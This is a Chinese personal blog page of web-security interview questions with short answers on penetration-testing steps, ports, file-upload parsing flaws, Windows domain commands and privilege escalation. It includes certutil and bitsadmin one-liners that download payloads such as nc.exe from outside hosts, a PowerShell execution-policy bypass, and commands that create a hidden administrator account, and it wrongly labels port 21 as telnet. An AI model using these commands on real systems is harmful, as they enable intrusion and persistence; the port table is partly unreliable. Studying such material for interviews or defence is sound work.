<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="web安全面试题1）给你一个目标站，你觉得应该先做什么？ 信息收集（域名子域、真实ip、端口服务探测） 漏洞发现（漏洞扫描、CMS识别、应用版本识别、poc验证漏洞存在、黑盒测试、源码审计） 漏洞利用（历史漏洞、EXP利用、能否反弹shell、爆库） 持续控制（提升权限、维持访问、清除痕迹） 2）写出下列端口对应的服务？    21 22 80 443 1433 3306 3389    teln">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="https://john-tlh.github.io/2021/06/09/%E5%AE%89%E6%B4%B5%E9%9D%A2%E8%AF%95%E9%A2%98/">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="web安全面试题1）给你一个目标站，你觉得应该先做什么？ 信息收集（域名子域、真实ip、端口服务探测） 漏洞发现（漏洞扫描、CMS识别、应用版本识别、poc验证漏洞存在、黑盒测试、源码审计） 漏洞利用（历史漏洞、EXP利用、能否反弹shell、爆库） 持续控制（提升权限、维持访问、清除痕迹） 2）写出下列端口对应的服务？    21 22 80 443 1433 3306 3389    teln">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2021-06-09T14:50:17.528Z">
<meta property="article:modified_time" content="2021-06-10T09:47:21.234Z">
<meta property="article:author" content="麦芽糖吖">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="搜索"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://john-tlh.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-安洵面试题" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2021/06/09/%E5%AE%89%E6%B4%B5%E9%9D%A2%E8%AF%95%E9%A2%98/" class="article-date">
  <time datetime="2021-06-09T14:50:17.528Z" itemprop="datePublished">2021-06-09</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="web安全面试题"><a href="#web安全面试题" class="headerlink" title="web安全面试题"></a>web安全面试题</h2><p><strong>1）给你一个目标站，你觉得应该先做什么？</strong></p>
<p>信息收集（域名子域、真实ip、端口服务探测）</p>
<p>漏洞发现（漏洞扫描、CMS识别、应用版本识别、poc验证漏洞存在、黑盒测试、源码审计）</p>
<p>漏洞利用（历史漏洞、EXP利用、能否反弹shell、爆库）</p>
<p>持续控制（提升权限、维持访问、清除痕迹）</p>
<p><strong>2）写出下列端口对应的服务？</strong></p>
<table>
<thead>
<tr>
<th>21</th>
<th>22</th>
<th>80</th>
<th>443</th>
<th>1433</th>
<th>3306</th>
<th>3389</th>
</tr>
</thead>
<tbody><tr>
<td>telnet</td>
<td>ssh</td>
<td>http</td>
<td>https</td>
<td>sqlserver</td>
<td>mysql</td>
<td><strong>mstsc</strong></td>
</tr>
</tbody></table>
<p><strong>3）常见的上传解析漏洞</strong></p>
<p><strong>apache：</strong>从右向左（abc.php.xxx.aaa.bbb） -&gt; abc.php</p>
<p><strong>iis6.0:</strong> </p>
<p>文件夹名泛解析（aaa.asp文件夹下的a.txt会以asp解析）</p>
<p>特殊文件名(;.jpg): aaa.asp;.jpg这个文件会以asp方式运行。</p>
<p><strong>iis7.0、7.5:</strong></p>
<p>任意文件名.jpg，在后面追加上/任意文件名.php，那么这个文件会以PHP方式来运行 比如<a target="_blank" rel="noopener" href="http://xxxxv/tila.jpg/ccc.php">http://xxxxv/tila.jpg/ccc.php</a> 会以tila.php解析。</p>
<p><strong>Nginx 解析漏洞：</strong></p>
<p>任意文件名后面添加xxx.php的方式来运行这个文件</p>
<p>在文件后面添加%00.php也会以php的方式运行。</p>
<p><strong>3）域内常用命令</strong></p>
<p><strong>ipconfig /all</strong>判断是否存在域，<strong>nslookup</strong>判断域控是否与dns服务器在同一服务器上，<strong>net config workstation</strong>查看登录域信息，<strong>net time /domain</strong>查看主域,若是报错或者显示时间，有域控。否则不存在域。</p>
<p><strong>4）域管账号密码对其他成员执行命令</strong></p>
<p><strong>5）cmd下远程文件下载</strong></p>
<p>vb下载：先echo写入vb脚本，然后cscript执行下载脚本</p>
<p>certutil一句话下载payload：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt</span><br></pre></td></tr></table></figure>

<p>ftp一句话下载payload：先echo写入ftp下载脚本，然后执行ftp -s:xxx</p>
<p>bitsadmin 下载一句话/payload：bitsadmin /transfer down /download /priority normal ‘<a target="_blank" rel="noopener" href="http://198.13.37.239/nc.exe&#39;">http://198.13.37.239/nc.exe&#39;</a> d:\nc.exe</p>
<p>js一句话读取/写入文件</p>
<p>powershell一句话下载payload：powershell.exe -ExecutionPolicy Bypass -File down.ps1</p>
<p><strong>6）抓包改包</strong></p>
<p>burp、fiddle、charles</p>
<p><strong>7）常见的web容器</strong></p>
<p>IIS,APACHE,NGINX,TOMCAT,WEBLOGIC,DJANGO,JBOSS</p>
<p><strong>8) 快速判断目标服务器是Windows还是linux</strong></p>
<p>是否大小写敏感</p>
<p><strong>9）常见的Windows提权方法</strong></p>
<p>1）syteminfo查看补丁信息，查找exp（内核提权）</p>
<p>2）mssql提取、udf提权</p>
<p>3）Windows系统配置错误提权(dll劫持、<strong>注册表键AlwaysInstallElevated</strong>、<strong>可信任服务路径漏洞</strong>、自动安装配置文件*、计划任务)</p>
<ol start="4">
<li>bypass uac</li>
</ol>
<p><strong>10）下列端口对应的服务</strong></p>
<table>
<thead>
<tr>
<th>873</th>
<th>5000</th>
<th>5900</th>
<th>1521</th>
</tr>
</thead>
<tbody><tr>
<td>rsync文件同步</td>
<td></td>
<td>vnc远程</td>
<td>oracle</td>
</tr>
</tbody></table>
<p><strong>11) .htaccess 文件配置jsp文件解析为php</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SetHandler application&#x2F;x-httpd-php</span><br></pre></td></tr></table></figure>

<p><strong>12) csrf ,ssrf .以及重放攻击的区别</strong></p>
<p>重放攻击：以登录业务为例（不具备身份，但是有认证信息）</p>
<p>csrf：以添加用户为例（已经有了一个身份、用户或者是管理员）</p>
<p>ssrf： 伪造服务端发送请求，探测内网</p>
<p><strong>13）windows下添加本地账户以及加入到管理员组的命令</strong></p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">net</span> user whoami$ Liu78963 /add</span><br><span class="line"><span class="built_in">net</span> localgroup administrators whoami$ /add</span><br></pre></td></tr></table></figure>

<p><strong>14) windows下&gt;与&gt;&gt;的区别：</strong>写入（会覆盖）与追加</p>
<p><strong>15）常见的javaweb应用以及框架</strong></p>
<p><strong>Hibernate、Struts2、MyBatis、Spring、spring MVC</strong> </p>
<p><strong>16）mysql 导出文件的命令</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysqldump 数据库名 <span class="comment">--host=主机 --port=端口 -u用户名 -p密码 --where=&quot;过滤条件&quot; --tables 数据表 &gt; 导出文件路径.sql</span></span><br></pre></td></tr></table></figure>

<p><strong>17）缓冲区溢出</strong></p>
<p><strong>18）DNS域传送</strong>漏洞复现命令</p>
<p><strong>19）nmap 默认扫描哪些端口</strong></p>
<p>默认情况下，Nmap用指定的协议对端口1到1024以及<code>nmap-services</code> 文件中列出的更高的端口在扫描。</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://john-tlh.github.io/2021/06/09/%E5%AE%89%E6%B4%B5%E9%9D%A2%E8%AF%95%E9%A2%98/" data-id="ckpsj2apo0001qsw25iyjets2" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2021/06/10/%E4%BB%8E%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%B0%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          从命令执行到内网渗透
        
      </div>
    </a>
  
  
    <a href="/2021/06/09/CNVD-2021-30193%20/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">从命令执行到getshell</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">分类</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0/">深度学习</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%BC%96%E7%A8%8B/">编程</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%BC%96%E7%A8%8B%E5%BC%80%E5%8F%91/">编程开发</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9A%8F%E7%AC%94/">随笔</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Docker/" rel="tag">Docker</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Kali/" rel="tag">Kali</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Keras/" rel="tag">Keras</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Pocsuite/" rel="tag">Pocsuite</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Pocsuite3/" rel="tag">Pocsuite3</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python/" rel="tag">Python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag">SQL注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Tools/" rel="tag">Tools</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WEB%E5%AE%89%E5%85%A8/" rel="tag">WEB安全</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/" rel="tag">XSS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/docker/" rel="tag">docker</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/github/" rel="tag">github</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/kali/" rel="tag">kali</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/metasploit/" rel="tag">metasploit</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pocsuite/" rel="tag">pocsuite</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/" rel="tag">python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/" rel="tag">python'</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web3-0/" rel="tag">web3.0</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web%E5%AE%89%E5%85%A8/" rel="tag">web安全</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%B9%A0%E6%83%AF/" rel="tag">习惯</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" rel="tag">内网渗透</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%8C%96%E7%9F%BF/" rel="tag">挖矿</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%96%B9%E6%B3%95%E4%B8%8E%E9%80%89%E6%8B%A9/" rel="tag">方法与选择</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag">漏洞复现</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BC%96%E8%BE%91%E5%99%A8/" rel="tag">编辑器</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%9D%B6%E5%9C%BA/" rel="tag">靶场</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%AB%98%E6%95%88%E5%B7%A5%E4%BD%9C/" rel="tag">高效工作</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签云</h3>
    <div class="widget tagcloud">
      <a href="/tags/Docker/" style="font-size: 18.33px;">Docker</a> <a href="/tags/Kali/" style="font-size: 16.67px;">Kali</a> <a href="/tags/Keras/" style="font-size: 10px;">Keras</a> <a href="/tags/Pocsuite/" style="font-size: 13.33px;">Pocsuite</a> <a href="/tags/Pocsuite3/" style="font-size: 10px;">Pocsuite3</a> <a href="/tags/Python/" style="font-size: 15px;">Python</a> <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" style="font-size: 10px;">SQL注入</a> <a href="/tags/Tools/" style="font-size: 13.33px;">Tools</a> <a href="/tags/WEB%E5%AE%89%E5%85%A8/" style="font-size: 10px;">WEB安全</a> <a href="/tags/XSS/" style="font-size: 13.33px;">XSS</a> <a href="/tags/docker/" style="font-size: 10px;">docker</a> <a href="/tags/github/" style="font-size: 10px;">github</a> <a href="/tags/kali/" style="font-size: 10px;">kali</a> <a href="/tags/metasploit/" style="font-size: 11.67px;">metasploit</a> <a href="/tags/pocsuite/" style="font-size: 10px;">pocsuite</a> <a href="/tags/python/" style="font-size: 11.67px;">python</a> <a href="/tags/python/" style="font-size: 10px;">python'</a> <a href="/tags/web3-0/" style="font-size: 10px;">web3.0</a> <a href="/tags/web%E5%AE%89%E5%85%A8/" style="font-size: 11.67px;">web安全</a> <a href="/tags/%E4%B9%A0%E6%83%AF/" style="font-size: 10px;">习惯</a> <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" style="font-size: 10px;">内网渗透</a> <a href="/tags/%E6%8C%96%E7%9F%BF/" style="font-size: 10px;">挖矿</a> <a href="/tags/%E6%96%B9%E6%B3%95%E4%B8%8E%E9%80%89%E6%8B%A9/" style="font-size: 10px;">方法与选择</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" style="font-size: 20px;">漏洞复现</a> <a href="/tags/%E7%BC%96%E8%BE%91%E5%99%A8/" style="font-size: 10px;">编辑器</a> <a href="/tags/%E9%9D%B6%E5%9C%BA/" style="font-size: 10px;">靶场</a> <a href="/tags/%E9%AB%98%E6%95%88%E5%B7%A5%E4%BD%9C/" style="font-size: 10px;">高效工作</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/11/">十一月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/10/">十月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/07/">七月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/06/">六月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/05/">五月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/02/">二月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/01/">一月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/12/">十二月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/11/">十一月 2020</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2021/11/21/%E5%92%B1%E5%B0%B1%E6%98%AF%E8%AF%B4%E5%85%B3%E4%BA%8E%E8%BF%99%E4%B8%AAMSF%E4%B8%8A%E7%BA%BF%E7%9A%84%E5%87%A0%E7%A7%8D%E6%96%B9%E5%BC%8F/">(no title)</a>
          </li>
        
          <li>
            <a href="/2021/11/20/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%ADPower%20Shell%E7%9A%84%E4%BD%BF%E7%94%A8/">(no title)</a>
          </li>
        
          <li>
            <a href="/2021/11/20/%E5%86%85%E7%BD%91%E6%A8%AA%E5%90%91/">(no title)</a>
          </li>
        
          <li>
            <a href="/2021/11/17/%E6%9A%97%E6%9C%88%E5%86%85%E7%BD%91%E9%9D%B6%E5%9C%BA%E9%A1%B9%E7%9B%AE7WP%EF%BC%9A/">(no title)</a>
          </li>
        
          <li>
            <a href="/2021/11/14/msf%20%E8%87%AA%E5%8A%A8%E8%B7%AF%E7%94%B1+sock%E4%BB%A3%E7%90%86%E5%AE%9E%E7%8E%B0%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2021 麦芽糖吖<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>